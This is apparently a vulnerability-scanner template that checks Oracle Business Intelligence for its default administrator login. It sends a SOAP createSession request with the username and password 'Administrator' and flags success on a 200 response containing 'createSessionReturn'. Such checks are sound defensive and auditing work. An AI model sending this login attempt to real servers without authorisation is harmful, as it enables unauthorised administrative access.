id: oracle-business-intelligence-password

info:
  name: Oracle Business Intelligence Default Login
  author: milo2012
  severity: high
  verified: false
  description: Oracle Business Intelligence default admin credentials were discovered.
  reference:
    - https://docs.oracle.com/cd/E12096_01/books/AnyDeploy/AnyDeployMisc2.html

rules:
  r0:
    request:
      method: POST
      path: /xmlpserver/services/XMLPService
      headers:
        Content-Type: text/xml
        SOAPAction: ""
      body: |
        <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:rep="http://xmlns.oracle.com/oxp/service/report">
           <soapenv:Header/>
           <soapenv:Body>
              <rep:createSession soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
                 <username xsi:type="xsd:string">Administrator</username>
                 <password xsi:type="xsd:string">Administrator</password>
                 <domain xsi:type="xsd:string">bi</domain>
              </rep:createSession>
           </soapenv:Body>
        </soapenv:Envelope>
    expression: response.status == 200 && response.body.bcontains(b'createSessionReturn')
expression: r0()